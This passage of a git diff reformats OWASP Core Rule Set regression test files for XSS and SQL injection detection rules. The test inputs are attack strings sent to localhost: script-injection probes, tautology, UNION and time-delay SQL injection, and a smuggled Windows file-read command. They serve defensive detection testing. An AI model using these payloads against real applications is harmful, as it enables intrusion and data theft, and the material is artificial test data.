text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index de766fa9f..7953c58c0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -2,23 +2,20 @@ meta: author: "Franziska Buehler, azurit" description: None - enabled: true - name: 941380.yaml tests: - - test_title: 941380-1 + - test_id: 1 desc: "AngularJS client side template injection detection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" - # /login?user={{constructor.constructor('alert(1)')()}} - version: HTTP/1.1 - output: - log_contains: id "941380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log_contains: id "941380" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index b412b7475..02e655dda 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -2,150 +2,139 @@ meta: author: "Franziska Buehler, Xhoenix, azurit" description: None - enabled: true - name: 941390.yaml tests: - - test_title: 941390-1 + - test_id: 1 desc: "JavaScript method setInterval(code, 1)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=setInterval%28code%2C%201%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=setInterval%28code%2C%201%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 2 desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 3 desc: "JavaScript method eval('2 + 2')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=eval%28%272%20%2B%202%27%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=eval%28%272%20%2B%202%27%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 4 desc: "JavaScript constructor new Function()" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=new%20Function%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=new%20Function%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 5 desc: "JavaScript call alert" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=alert%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=alert%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 6 desc: "JavaScript call atob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=atob%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=atob%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 7 desc: "JavaScript call btoa" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=btoa%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=btoa%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 8 desc: "JavaScript call prompt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=prompt%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=prompt%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 9 desc: "JavaScript call confirm" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=confirm%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=confirm%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index ddecdfe8e..6650ffb2b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -2,118 +2,109 @@ meta: author: "Andrea Menin, azurit" description: None - enabled: true - name: 941400.yaml tests: - - test_title: 941400-1 + - test_id: 1 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 2 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 3 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 4 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 5 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 6 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 7 desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=Reflect.sort.call%60%60" - version: HTTP/1.1 - output: - log_contains: id "941400" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=Reflect.sort.call%60%60" + version: HTTP/1.1 + output: + log_contains: id "941400" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 69fb90117..7a8b5e8ca 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -2,244 +2,229 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942100.yaml +rule_id: 942100 tests: - - test_title: 942100-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1234 OR 1=1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839' or '1'='1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839\" or \"1\"=\"2" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 4 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 5 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue' and 526=527" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue' and 526=527" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 7 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 8 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 9 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 10 desc: "Advanced SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "1'||(select extractvalue(xmltype('%toyop;" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 11 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 12 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 13 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\" | type %SystemDrive%\\\\config.ini | \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 14 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" - version: HTTP/1.0 - output: - log_contains: id "942100" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log_contains: id "942100" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 37a054a9a..7237a3bc7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml @@ -2,182 +2,170 @@ meta: author: "Christian Folini, Matteo Pace, azurit" description: Various SQL injection tests - enabled: true - name: 942101.yaml +rule_id: 942101 tests: - - test_title: 942101-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/1234%20OR%201=1" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/1234%20OR%201=1" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 2 desc: "Basic SQL injection" stages: - - stage: - input: - 